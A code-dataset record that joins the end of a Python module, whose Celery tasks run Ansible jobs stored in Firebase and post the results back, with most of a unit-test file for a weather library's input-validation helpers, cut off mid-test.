#tmpFile.close()
results = ansible.runner.Runner(
pattern=myPattern,
forks=10,
module_name=myModuleName,
module_args=myModuleArgs,
remote_user=myRemoteUser,
remote_pass=myRemotePass,
host_list=myHostList
#private_key_file='/tmp/keykey'
).run()
# get it to a good format
#data = json.loads(results)
#data = json.dumps(results)
# set status to COMPLETE
myExternalData.patch(job_id, json.loads('{"status":"COMPLETE"}'))
#if type(results) == dict:
# results = utils.jsonify(results)
# post results to firebase
myExternalData.post(job_id + '/returns', json.loads(results), {'print': 'pretty'}, {'X_FANCY_HEADER': 'VERY FANCY'})
#returns.patch(job_id + '/returns', json.dumps(results))
return results
@task()
def ansible_jeneric(job_id, user_id):
# firebase authentication
SECRET = os.environ['SECRET']
authentication = FirebaseAuthentication(SECRET, True, True)
# set the specific job from firebase with user
user = 'simplelogin:' + user_id
URL = 'https://deploynebula.firebaseio.com/users/' + user + '/external_data/'
myExternalData = FirebaseApplication(URL, authentication)
# update status to RUNNING in firebase
myExternalData.patch(job_id, json.loads('{"status":"RUNNING"}'))
# finally, get the actual job
job = myExternalData.get(URL, job_id)
myHostList = job['host_list'] +','
myModuleName = job['module_name']
myModuleArgs = job['module_args']
myPattern = job['pattern']
myRemoteUser = job['remote_user']
myRemotePass = job['remote_pass']
runString = ""
for arg in myHostList, myModuleName, myModuleArgs, myPattern, myRemoteUser, myRemotePass:
if ( arg ):
runString = runString + arg
results = ansible.runner.Runner(
pattern=myPattern,
forks=10,
module_name=myModuleName,
module_args=myModuleArgs,
remote_user=myRemoteUser,
remote_pass=myRemotePass,
host_list=myHostList,
).run()
# run the ansible stuffs
#results = ansible.runner.Runner(
# pattern=myHost, forks=10,
# module_name='command', module_args=myCommand,
#).run()
# get it to a good format
#data = json.loads(results)
#data = json.dumps(results)
# set status to COMPLETE
myExternalData.patch(job_id, json.loads('{"status":"COMPLETE"}'))
if type(results) == dict:
results = utils.jsonify(results)
# post results to firebase
myExternalData.post(job_id + '/returns', results)
#returns.patch(job_id + '/returns', json.dumps(results))
return results
@task()
def ansible_command_run(job_id, user_id):
# firebase authentication
SECRET = os.environ['SECRET']
authentication = FirebaseAuthentication(SECRET, True, True)
# set the specific job from firebase with user
user = 'simplelogin:' + user_id
URL = 'https://deploynebula.firebaseio.com/users/' + user + '/external_data/'
myExternalData = FirebaseApplication(URL, authentication)
# update status to RUNNING in firebase
myExternalData.patch(job_id, json.loads('{"status":"RUNNING"}'))
# finally, get the actual job
job = myExternalData.get(URL, job_id)
myHost = job['host']
myCommand = job['command']
# run the ansible stuffs
results = ansible.runner.Runner(
pattern=myHost, forks=10,
module_name='command', module_args=myCommand,
).run()
# get it to a good format
#data = json.loads(results)
#data = json.dumps(results)
# set status to COMPLETE
myExternalData.patch(job_id, json.loads('{"status":"COMPLETE"}'))
# post results to firebase
myExternalData.post(job_id + '/returns', json.dumps(results))
#returns.patch(job_id + '/returns', json.dumps(results))
return results
@task()
def ansible_ping(job_id, user_id):
# firebase authentication
SECRET = os.environ['SECRET']
authentication = FirebaseAuthentication(SECRET, True, True)
# set the specific job from firebase with user
user = 'simplelogin:' + user_id
URL = 'https://deploynebula.firebaseio.com/users/' + user + '/external_data/'
myExternalData = FirebaseApplication(URL, authentication)
# update status to RUNNING in firebase
myExternalData.patch(job_id, json.loads('{"status":"RUNNING"}'))
# finally, get the actual job
job = myExternalData.get(URL, job_id)
# get host from job
# NEEDS UPDATING FOR SPECIFICS
myHost = job['host']
# run the ansible stuffs
results = ansible.runner.Runner(
module_name='ping',
module_args='',
pattern=myHost,
forks=10
).run()
# get it to a good format
#data = json.loads(results)
#data = json.dumps(results)
# set status to COMPLETE
other_result = myExternalData.patch(job_id, json.loads('{"status":"COMPLETE"}'))
# post results to firebase
#returns = FirebaseApplication('https://deploynebula.firebaseio.com/external_data/', authentication)
myExternalData.post(job_id + '/returns', json.dumps(results))
#returns.patch(job_id + '/returns', json.dumps(results))
return results
| 29.916667 | 120 | 0.662334 | 728 | 6,462 | 5.774725 | 0.149725 | 0.029734 | 0.028544 | 0.045671 | 0.822312 | 0.821598 | 0.804472 | 0.804472 | 0.793768 | 0.793768 | 0 | 0.001979 | 0.218044 | 6,462 | 215 | 121 | 30.055814 | 0.830002 | 0.281492 | 0 | 0.701923 | 0 | 0 | 0.146347 | 0.018321 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0.048077 | 0.048077 | 0 | 0.125 | 0.009615 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c14d6a77ec834cce6720d35ebb68abfa457ee2f0 | 47,356 | py | Python | gewittergefahr/gg_utils/error_checking_test.py | dopplerchase/GewitterGefahr | 4415b08dd64f37eba5b1b9e8cc5aa9af24f96593 | [
"MIT"
] | 26 | 2018-10-04T01:07:35.000Z | 2022-01-29T08:49:32.000Z | gewittergefahr/gg_utils/error_checking_test.py | liuximarcus/GewitterGefahr | d819874d616f98a25187bfd3091073a2e6d5279e | [
"MIT"
] | 4 | 2017-12-25T02:01:08.000Z | 2018-12-19T01:54:21.000Z | gewittergefahr/gg_utils/error_checking_test.py | liuximarcus/GewitterGefahr | d819874d616f98a25187bfd3091073a2e6d5279e | [
"MIT"
] | 11 | 2017-12-10T23:05:29.000Z | 2022-01-29T08:49:33.000Z | """Unit tests for error_checking.py."""
import unittest
import os.path
import numpy
import pandas
from gewittergefahr.gg_utils import error_checking
COLUMNS_IN_DATAFRAME = ['foo', 'bar']
FAKE_COLUMNS_IN_DATAFRAME = ['foo', 'bar', 'moo']
DATAFRAME = pandas.DataFrame.from_dict(
{'foo': numpy.array([]), 'bar': numpy.array([])})
THIS_FILE_NAME = __file__
THIS_DIRECTORY_NAME = os.path.split(THIS_FILE_NAME)[0]
FAKE_FILE_NAME = THIS_FILE_NAME + '-_=+'
FAKE_DIRECTORY_NAME = THIS_DIRECTORY_NAME + '-_=+'
SINGLE_INTEGER = 1959
SINGLE_FLOAT = 1959.
SINGLE_BOOLEAN = True
SINGLE_COMPLEX_NUMBER = complex(1., 1.)
SINGLE_STRING = '1959'
STRING_LIST = [['do', 're'],
[['mi', 'fa']],
[[['so'], 'la']],
[['ti', 'do'], [[[' ']]]],
'']
REAL_NUMBER_LIST = [[211., 215],
[[214, 199.]],
[[[226.], 205.]],
[[221, 211], [[[32]]]],
0.]
REAL_NUMBER_TUPLE = ((211., 215),
((214, 199.),),
(((226.,), 205.),),
((221, 211), (((32,),),)),
0.)
REAL_NUMPY_ARRAY = numpy.array([[211., 215],
[214, 199.],
[226., 205.],
[221, 211],
[32, 0.]])
BOOLEAN_NUMPY_ARRAY = numpy.array([[False, True],
[True, False],
[True, False],
[True, False],
[False, False]])
FLOAT_NUMPY_ARRAY = numpy.array([[211., 215.],
[214., 199.],
[226., 205.],
[221., 211.],
[32., 0.]])
INTEGER_NUMPY_ARRAY = numpy.array([[211, 215],
[214, 199],
[226, 205],
[221, 211],
[32, 0]])
NAN_NUMPY_ARRAY = numpy.array([[numpy.nan, numpy.nan],
[numpy.nan, numpy.nan],
[numpy.nan, numpy.nan],
[numpy.nan, numpy.nan],
[numpy.nan, numpy.nan]])
SINGLE_ZERO = 0.
SINGLE_NEGATIVE = -2.2
SINGLE_POSITIVE = 4.3
POSITIVE_NUMPY_ARRAY = numpy.array([[211., 215],
[214, 199.],
[226., 205.],
[221, 211],
[32, 1.]])
NON_NEGATIVE_NUMPY_ARRAY = numpy.array([[211., 215],
[214, 199.],
[226., 205.],
[221, 211],
[32, 0.]])
NEGATIVE_NUMPY_ARRAY = numpy.array([[-211., -215],
[-214, -199.],
[-226., -205.],
[-221, -211],
[-32, -1.]])
NON_POSITIVE_NUMPY_ARRAY = numpy.array([[-211., -215],
[-214, -199.],
[-226., -205.],
[-221, -211],
[-32, 0.]])
MIXED_SIGN_NUMPY_ARRAY = numpy.array([[-211., 215],
[-214, -199.],
[-226., 205.],
[221, 211],
[-32, 0.]])
POSITIVE_NUMPY_ARRAY_WITH_NANS = numpy.array([[numpy.nan, 215],
[214, 199.],
[226., numpy.nan],
[221, 211],
[32, 1.]])
NON_NEGATIVE_NUMPY_ARRAY_WITH_NANS = numpy.array([[numpy.nan, 215],
[214, 199.],
[226., numpy.nan],
[221, 211],
[32, 0.]])
NEGATIVE_NUMPY_ARRAY_WITH_NANS = numpy.array([[numpy.nan, -215],
[-214, -199.],
[-226., numpy.nan],
[-221, -211],
[-32, -1.]])
NON_POSITIVE_NUMPY_ARRAY_WITH_NANS = numpy.array([[numpy.nan, -215],
[-214, -199.],
[-226., numpy.nan],
[-221, -211],
[-32, 0.]])
SINGLE_LATITUDE_DEG = 45.
SINGLE_LAT_INVALID_DEG = -500.
LAT_NUMPY_ARRAY_DEG = numpy.array([[42., -35.],
[35., -61.],
[33., 30.],
[-44., 39.]])
LAT_NUMPY_ARRAY_INVALID_DEG = numpy.array([[420., -350.],
[350., -610.],
[330., 300.],
[-440., 390.]])
LAT_NUMPY_ARRAY_SOME_INVALID_DEG = numpy.array([[42., -350.],
[35., -61.],
[330., 30.],
[-440., 39.]])
LAT_NUMPY_ARRAY_WITH_NANS_DEG = numpy.array([[42., -35.],
[numpy.nan, -61.],
[33., 30.],
[-44., numpy.nan]])
SINGLE_LONGITUDE_DEG = 45.
SINGLE_LNG_INVALID_DEG = 7000.
SINGLE_LNG_POSITIVE_IN_WEST_DEG = 270.
SINGLE_LNG_NEGATIVE_IN_WEST_DEG = -90.
LNG_NUMPY_ARRAY_DEG = numpy.array([[-73., 254.],
[101., -149.],
[84., 263.],
[243., 76.]])
LNG_NUMPY_ARRAY_INVALID_DEG = numpy.array([[-730., 2540.],
[1010., -1490.],
[840., 2630.],
[2430., 760.]])
LNG_NUMPY_ARRAY_SOME_INVALID_DEG = numpy.array([[-73., 2540.],
[101., -1490.],
[840., 263.],
[243., 76.]])
LNG_NUMPY_ARRAY_POSITIVE_IN_WEST_DEG = numpy.array([[287., 254.],
[101., 211.],
[84., 263.],
[243., 76.]])
LNG_NUMPY_ARRAY_NEGATIVE_IN_WEST_DEG = numpy.array([[-73., -106.],
[101., -149.],
[84., -97.],
[-117., 76.]])
class ErrorCheckingTests(unittest.TestCase):
"""Each method is a unit test for error_checking.py."""
def test_assert_columns_in_dataframe_list(self):
"""Checks assert_columns_in_dataframe when input is list."""
with self.assertRaises(TypeError):
error_checking.assert_columns_in_dataframe(
REAL_NUMBER_LIST, FAKE_COLUMNS_IN_DATAFRAME)
def test_assert_columns_in_dataframe_tuple(self):
"""Checks assert_columns_in_dataframe when input is tuple."""
with self.assertRaises(TypeError):
error_checking.assert_columns_in_dataframe(
REAL_NUMBER_TUPLE, FAKE_COLUMNS_IN_DATAFRAME)
def test_assert_columns_in_dataframe_numpy_array(self):
"""Checks assert_columns_in_dataframe when input is numpy array."""
with self.assertRaises(TypeError):
error_checking.assert_columns_in_dataframe(
REAL_NUMPY_ARRAY, FAKE_COLUMNS_IN_DATAFRAME)
def test_assert_columns_in_dataframe_missing_columns(self):
"""Checks assert_columns_in_dataframe.
In this case, input is pandas DataFrame but is missing one of the
desired columns.
"""
with self.assertRaises(KeyError):
error_checking.assert_columns_in_dataframe(
DATAFRAME, FAKE_COLUMNS_IN_DATAFRAME)
def test_assert_columns_in_dataframe_true(self):
"""Checks assert_columns_in_dataframe.
In this case, input is pandas DataFrame with all desired columns.
"""
error_checking.assert_columns_in_dataframe(DATAFRAME,
COLUMNS_IN_DATAFRAME)
def test_assert_is_array_scalar(self):
"""Checks assert_is_array when input is scalar."""
with self.assertRaises(TypeError):
error_checking.assert_is_array(SINGLE_INTEGER)
def test_assert_is_array_list(self):
"""Checks assert_is_array when input is list."""
error_checking.assert_is_array(REAL_NUMBER_LIST)
def test_assert_is_array_tuple(self):
"""Checks assert_is_array when input is tuple."""
error_checking.assert_is_array(REAL_NUMBER_TUPLE)
def test_assert_is_array_numpy_array(self):
"""Checks assert_is_array when input is numpy array."""
error_checking.assert_is_array(REAL_NUMPY_ARRAY)
def test_assert_is_list_scalar(self):
"""Checks assert_is_list when input is scalar."""
with self.assertRaises(TypeError):
error_checking.assert_is_list(SINGLE_INTEGER)
def test_assert_is_list_true(self):
"""Checks assert_is_list when input is list."""
error_checking.assert_is_list(REAL_NUMBER_LIST)
def test_assert_is_list_tuple(self):
"""Checks assert_is_list when input is tuple."""
with self.assertRaises(TypeError):
error_checking.assert_is_list(REAL_NUMBER_TUPLE)
def test_assert_is_list_numpy_array(self):
"""Checks assert_is_list when input is numpy array."""
with self.assertRaises(TypeError):
error_checking.assert_is_list(REAL_NUMPY_ARRAY)
def test_assert_is_tuple_scalar(self):
"""Checks assert_is_tuple when input is scalar."""
with self.assertRaises(TypeError):
error_checking.assert_is_tuple(SINGLE_INTEGER)
def test_assert_is_tuple_list(self):
"""Checks assert_is_tuple when input is list."""
with self.assertRaises(TypeError):
error_checking.assert_is_tuple(REAL_NUMBER_LIST)
def test_assert_is_tuple_true(self):
"""Checks assert_is_tuple when input is tuple."""
error_checking.assert_is_tuple(REAL_NUMBER_TUPLE)
def test_assert_is_tuple_numpy_array(self):
"""Checks assert_is_tuple when input is numpy array."""
with self.assertRaises(TypeError):
error_checking.assert_is_tuple(REAL_NUMPY_ARRAY)
def test_assert_is_numpy_array_scalar(self):
"""Checks assert_is_numpy_array when input is scalar."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(SINGLE_INTEGER)
def test_assert_is_numpy_array_list(self):
"""Checks assert_is_numpy_array when input is list."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(REAL_NUMBER_LIST)
def test_assert_is_numpy_array_tuple(self):
"""Checks assert_is_numpy_array when input is tuple."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(REAL_NUMBER_TUPLE)
def test_assert_is_numpy_array_true(self):
"""Checks assert_is_numpy_array when input is numpy array."""
error_checking.assert_is_numpy_array(REAL_NUMPY_ARRAY)
def test_assert_is_numpy_array_num_dim_not_integer(self):
"""Checks assert_is_numpy_array when `num_dimensions` is not integer."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=float(REAL_NUMPY_ARRAY.ndim))
def test_assert_is_numpy_array_num_dim_negative(self):
"""Checks assert_is_numpy_array when `num_dimensions` is negative."""
with self.assertRaises(ValueError):
error_checking.assert_is_numpy_array(REAL_NUMPY_ARRAY,
num_dimensions=-1)
def test_assert_is_numpy_array_num_dim_unexpected(self):
"""Checks assert_is_numpy_array when `num_dimensions` is unexpected."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim + 1)
def test_assert_is_numpy_array_num_dim_correct(self):
"""Checks assert_is_numpy_array when `num_dimensions` is correct."""
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim)
def test_assert_is_numpy_array_exact_dim_scalar(self):
"""Checks assert_is_numpy_array when `exact_dimensions` is scalar."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim,
exact_dimensions=REAL_NUMPY_ARRAY.shape[0])
def test_assert_is_numpy_array_exact_dim_list(self):
"""Checks assert_is_numpy_array when `exact_dimensions` is list."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim,
exact_dimensions=REAL_NUMPY_ARRAY.shape)
def test_assert_is_numpy_array_exact_dim_not_integers(self):
"""Checks assert_is_numpy_array when `exact_dimensions` is not int."""
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim,
exact_dimensions=numpy.asarray(REAL_NUMPY_ARRAY.shape,
dtype=numpy.float64))
def test_assert_is_numpy_array_exact_dim_negative(self):
"""Checks assert_is_numpy_array when `exact_dimensions` has negative."""
these_dimensions = -1 * numpy.asarray(REAL_NUMPY_ARRAY.shape,
dtype=numpy.int64)
with self.assertRaises(ValueError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim,
exact_dimensions=these_dimensions)
def test_assert_is_numpy_array_exact_dim_too_long(self):
"""Checks assert_is_numpy_array when `exact_dimensions` is too long."""
these_dimensions = numpy.concatenate((
numpy.asarray(REAL_NUMPY_ARRAY.shape, dtype=numpy.int64),
numpy.array([1])))
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim,
exact_dimensions=these_dimensions)
def test_assert_is_numpy_array_exact_dim_unexpected(self):
"""Checks assert_is_numpy_array when `exact_dimensions` is wrong."""
these_dimensions = 1 + numpy.asarray(REAL_NUMPY_ARRAY.shape,
dtype=numpy.int64)
with self.assertRaises(TypeError):
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim,
exact_dimensions=these_dimensions)
def test_assert_is_numpy_array_exact_dim_correct(self):
"""Checks assert_is_numpy_array when `exact_dimensions` is correct."""
error_checking.assert_is_numpy_array(
REAL_NUMPY_ARRAY, num_dimensions=REAL_NUMPY_ARRAY.ndim,
exact_dimensions=numpy.asarray(REAL_NUMPY_ARRAY.shape,
dtype=numpy.int64))
def test_assert_is_non_array_true(self):
"""Checks assert_is_non_array when input is scalar."""
error_checking.assert_is_non_array(SINGLE_INTEGER)
def test_assert_is_non_array_list(self):
"""Checks assert_is_non_array when input is list."""
with self.assertRaises(TypeError):
error_checking.assert_is_non_array(REAL_NUMBER_LIST)
def test_assert_is_non_array_tuple(self):
"""Checks assert_is_non_array when input is tuple."""
with self.assertRaises(TypeError):
error_checking.assert_is_non_array(REAL_NUMBER_TUPLE)
def test_assert_is_non_array_numpy_array(self):
"""Checks assert_is_non_array when input is numpy array."""
with self.assertRaises(TypeError):
error_checking.assert_is_non_array(REAL_NUMPY_ARRAY)
def test_assert_is_string_number(self):
"""Checks assert_is_string when input is number."""
with self.assertRaises(TypeError):
error_checking.assert_is_string(SINGLE_INTEGER)
def test_assert_is_string_none(self):
"""Checks assert_is_string when input is None."""
with self.assertRaises(TypeError):
error_checking.assert_is_string(None)
def test_assert_is_string_true(self):
"""Checks assert_is_string when input is string."""
error_checking.assert_is_string(SINGLE_STRING)
def test_assert_is_string_list_true(self):
"""Checks assert_is_string_list when input is string list."""
error_checking.assert_is_string_list(STRING_LIST)
def test_assert_file_exists_directory(self):
"""Checks assert_file_exists when input is directory."""
with self.assertRaises(ValueError):
error_checking.assert_file_exists(THIS_DIRECTORY_NAME)
def test_assert_file_exists_fake(self):
"""Checks assert_file_exists when input is fake file."""
with self.assertRaises(ValueError):
error_checking.assert_file_exists(FAKE_FILE_NAME)
def test_assert_file_exists_true(self):
"""Checks assert_file_exists when input is existent file."""
error_checking.assert_file_exists(THIS_FILE_NAME)
def test_assert_directory_exists_file(self):
"""Checks assert_directory_exists when input is file."""
with self.assertRaises(ValueError):
error_checking.assert_directory_exists(THIS_FILE_NAME)
def test_assert_directory_exists_fake(self):
"""Checks assert_directory_exists when input is fake directory."""
with self.assertRaises(ValueError):
error_checking.assert_directory_exists(FAKE_DIRECTORY_NAME)
def test_assert_directory_exists_true(self):
"""Checks assert_directory_exists when input is existent directory."""
error_checking.assert_directory_exists(THIS_DIRECTORY_NAME)
def test_assert_is_integer_too_many_inputs(self):
"""Checks assert_is_integer when input is array of integers."""
with self.assertRaises(TypeError):
error_checking.assert_is_integer(INTEGER_NUMPY_ARRAY)
def test_assert_is_integer_float(self):
"""Checks assert_is_integer when input is float."""
with self.assertRaises(TypeError):
error_checking.assert_is_integer(SINGLE_FLOAT)
def test_assert_is_integer_boolean(self):
"""Checks assert_is_integer when input is Boolean."""
with self.assertRaises(TypeError):
error_checking.assert_is_integer(SINGLE_BOOLEAN)
def test_assert_is_integer_complex(self):
"""Checks assert_is_integer when input is complex."""
with self.assertRaises(TypeError):
error_checking.assert_is_integer(SINGLE_COMPLEX_NUMBER)
def test_assert_is_integer_nan(self):
"""Checks assert_is_integer when input is NaN."""
with self.assertRaises(TypeError):
error_checking.assert_is_integer(numpy.nan)
def test_assert_is_integer_none(self):
"""Checks assert_is_integer when input is None."""
with self.assertRaises(TypeError):
error_checking.assert_is_integer(None)
def test_assert_is_integer_true(self):
"""Checks assert_is_integer when input is integer."""
error_checking.assert_is_integer(SINGLE_INTEGER)
def test_assert_is_integer_numpy_array_true(self):
"""Checks assert_is_integer_numpy_array when condition is true."""
error_checking.assert_is_integer_numpy_array(INTEGER_NUMPY_ARRAY)
def test_assert_is_boolean_too_many_inputs(self):
"""Checks assert_is_boolean when input is array of Booleans."""
with self.assertRaises(TypeError):
error_checking.assert_is_boolean(BOOLEAN_NUMPY_ARRAY)
def test_assert_is_boolean_float(self):
"""Checks assert_is_boolean when input is float."""
with self.assertRaises(TypeError):
error_checking.assert_is_boolean(SINGLE_FLOAT)
def test_assert_is_boolean_true(self):
"""Checks assert_is_boolean when input is Boolean."""
error_checking.assert_is_boolean(SINGLE_BOOLEAN)
def test_assert_is_boolean_complex(self):
"""Checks assert_is_boolean when input is complex."""
with self.assertRaises(TypeError):
error_checking.assert_is_boolean(SINGLE_COMPLEX_NUMBER)
def test_assert_is_boolean_nan(self):
"""Checks assert_is_boolean when input is NaN."""
with self.assertRaises(TypeError):
error_checking.assert_is_boolean(numpy.nan)
def test_assert_is_boolean_none(self):
"""Checks assert_is_boolean when input is None."""
with self.assertRaises(TypeError):
error_checking.assert_is_boolean(None)
def test_assert_is_boolean_integer(self):
"""Checks assert_is_boolean when input is integer."""
with self.assertRaises(TypeError):
error_checking.assert_is_boolean(SINGLE_INTEGER)
def test_assert_is_boolean_numpy_array_true(self):
"""Checks assert_is_boolean_numpy_array when condition is true."""
error_checking.assert_is_boolean_numpy_array(BOOLEAN_NUMPY_ARRAY)
def test_assert_is_float_too_many_inputs(self):
"""Checks assert_is_float when input is array of floats."""
with self.assertRaises(TypeError):
error_checking.assert_is_float(FLOAT_NUMPY_ARRAY)
def test_assert_is_float_true(self):
"""Checks assert_is_float when input is float."""
error_checking.assert_is_float(SINGLE_FLOAT)
def test_assert_is_float_boolean(self):
"""Checks assert_is_float when input is Boolean."""
with self.assertRaises(TypeError):
error_checking.assert_is_float(SINGLE_BOOLEAN)
def test_assert_is_float_complex(self):
"""Checks assert_is_float when input is complex."""
with self.assertRaises(TypeError):
error_checking.assert_is_float(SINGLE_COMPLEX_NUMBER)
def test_assert_is_float_nan(self):
"""Checks assert_is_float when input is NaN."""
error_checking.assert_is_float(numpy.nan)
def test_assert_is_float_none(self):
"""Checks assert_is_float when input is None."""
with self.assertRaises(TypeError):
error_checking.assert_is_float(None)
def test_assert_is_float_integer(self):
"""Checks assert_is_float when input is integer."""
with self.assertRaises(TypeError):
error_checking.assert_is_float(SINGLE_INTEGER)
def test_assert_is_float_numpy_array_true(self):
"""Checks assert_is_float_numpy_array when condition is true."""
error_checking.assert_is_float_numpy_array(FLOAT_NUMPY_ARRAY)
def test_assert_is_real_number_too_many_inputs(self):
"""Checks assert_is_real_number when input is array of real numbers."""
with self.assertRaises(TypeError):
error_checking.assert_is_real_number(FLOAT_NUMPY_ARRAY)
def test_assert_is_real_number_float(self):
"""Checks assert_is_real_number when input is float."""
error_checking.assert_is_real_number(SINGLE_FLOAT)
def test_assert_is_real_number_boolean(self):
"""Checks assert_is_real_number when input is Boolean."""
with self.assertRaises(TypeError):
error_checking.assert_is_real_number(SINGLE_BOOLEAN)
def test_assert_is_real_number_complex(self):
"""Checks assert_is_real_number when input is complex."""
with self.assertRaises(TypeError):
error_checking.assert_is_real_number(SINGLE_COMPLEX_NUMBER)
def test_assert_is_real_number_nan(self):
"""Checks assert_is_real_number when input is NaN."""
error_checking.assert_is_real_number(numpy.nan)
def test_assert_is_real_number_none(self):
"""Checks assert_is_real_number when input is None."""
with self.assertRaises(TypeError):
error_checking.assert_is_real_number(None)
def test_assert_is_real_number_integer(self):
"""Checks assert_is_real_number when input is integer."""
error_checking.assert_is_real_number(SINGLE_INTEGER)
def test_assert_is_real_numpy_array_true(self):
"""Checks assert_is_real_numpy_array when condition is true."""
error_checking.assert_is_real_numpy_array(FLOAT_NUMPY_ARRAY)
def test_assert_is_not_nan_too_many_inputs(self):
"""Checks assert_is_not_nan when input is array of floats."""
with self.assertRaises(TypeError):
error_checking.assert_is_not_nan(FLOAT_NUMPY_ARRAY)
def test_assert_is_not_nan_float(self):
"""Checks assert_is_not_nan when input is float."""
error_checking.assert_is_not_nan(SINGLE_FLOAT)
def test_assert_is_not_nan_boolean(self):
"""Checks assert_is_not_nan when input is Boolean."""
with self.assertRaises(TypeError):
error_checking.assert_is_not_nan(SINGLE_BOOLEAN)
def test_assert_is_not_nan_complex(self):
"""Checks assert_is_not_nan when input is complex."""
with self.assertRaises(TypeError):
error_checking.assert_is_not_nan(SINGLE_COMPLEX_NUMBER)
def test_assert_is_not_nan_nan(self):
"""Checks assert_is_not_nan when input is NaN."""
with self.assertRaises(ValueError):
error_checking.assert_is_not_nan(numpy.nan)
def test_assert_is_not_nan_none(self):
"""Checks assert_is_not_nan when input is None."""
with self.assertRaises(TypeError):
error_checking.assert_is_not_nan(None)
def test_assert_is_not_nan_integer(self):
"""Checks assert_is_not_nan when input is integer."""
error_checking.assert_is_not_nan(SINGLE_INTEGER)
def test_assert_is_numpy_array_without_nan_all_nan(self):
"""Checks assert_is_numpy_array_without_nan; input is all NaN's."""
with self.assertRaises(ValueError):
error_checking.assert_is_numpy_array_without_nan(NAN_NUMPY_ARRAY)
def test_assert_is_numpy_array_without_nan_mixed(self):
"""Checks assert_is_numpy_array_without_nan; input has some NaN's."""
with self.assertRaises(ValueError):
error_checking.assert_is_numpy_array_without_nan(
POSITIVE_NUMPY_ARRAY_WITH_NANS)
def test_assert_is_numpy_array_without_nan_true(self):
"""Checks assert_is_numpy_array_without_nan; input has no NaN's."""
error_checking.assert_is_numpy_array_without_nan(POSITIVE_NUMPY_ARRAY)
def test_assert_is_positive_negative(self):
"""Checks assert_is_greater with base_value = 0, input_variable < 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_greater(SINGLE_NEGATIVE, 0)
def test_assert_is_positive_zero(self):
"""Checks assert_is_greater with base_value = 0, input_variable = 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_greater(SINGLE_ZERO, 0)
def test_assert_is_positive_true(self):
"""Checks assert_is_greater with base_value = 0, input_variable > 0."""
error_checking.assert_is_greater(SINGLE_POSITIVE, 0)
def test_assert_is_positive_nan_allowed(self):
"""Checks assert_is_greater; input_variable = NaN, allow_nan = True."""
error_checking.assert_is_greater(numpy.nan, 0, allow_nan=True)
def test_assert_is_positive_nan_banned(self):
"""Checks assert_is_greater; input_variable = NaN, allow_nan = False."""
with self.assertRaises(ValueError):
error_checking.assert_is_greater(numpy.nan, 0, allow_nan=False)
def test_assert_is_positive_numpy_array_true(self):
"""Checks assert_is_greater_numpy_array; base_value = 0, inputs > 0."""
error_checking.assert_is_greater_numpy_array(POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_positive_numpy_array_true_with_nan_allowed(self):
"""Checks assert_is_greater_numpy_array; base_value = 0, inputs > 0.
In this case, input array contains NaN's and allow_nan = True.
"""
error_checking.assert_is_greater_numpy_array(
POSITIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=True)
def test_assert_is_positive_numpy_array_true_with_nan_banned(self):
"""Checks assert_is_greater_numpy_array; base_value = 0, inputs > 0.
In this case, input array contains NaN's and allow_nan = False.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_greater_numpy_array(
POSITIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=False)
def test_assert_is_positive_numpy_array_non_negative(self):
"""Checks assert_is_greater_numpy_array; base_value = 0, inputs >= 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_greater_numpy_array(
NON_NEGATIVE_NUMPY_ARRAY, 0)
def test_assert_is_positive_numpy_array_negative(self):
"""Checks assert_is_greater_numpy_array; base_value = 0, inputs < 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_greater_numpy_array(
NEGATIVE_NUMPY_ARRAY, 0)
def test_assert_is_positive_numpy_array_non_positive(self):
"""Checks assert_is_greater_numpy_array; base_value = 0, inputs <= 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_greater_numpy_array(
NON_POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_positive_numpy_array_mixed_sign(self):
"""assert_is_greater_numpy_array; base_value = 0, inputs mixed sign."""
with self.assertRaises(ValueError):
error_checking.assert_is_greater_numpy_array(
MIXED_SIGN_NUMPY_ARRAY, 0)
def test_assert_is_non_negative_false(self):
"""Checks assert_is_geq with base_value = 0, input_variable < 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_geq(SINGLE_NEGATIVE, 0)
def test_assert_is_non_negative_zero(self):
"""Checks assert_is_geq with base_value = 0, input_variable = 0."""
error_checking.assert_is_geq(SINGLE_ZERO, 0)
def test_assert_is_non_negative_positive(self):
"""Checks assert_is_geq with base_value = 0, input_variable > 0."""
error_checking.assert_is_geq(SINGLE_POSITIVE, 0)
def test_assert_is_non_negative_numpy_array_positive(self):
"""Checks assert_is_geq_numpy_array; base_value = 0, inputs > 0."""
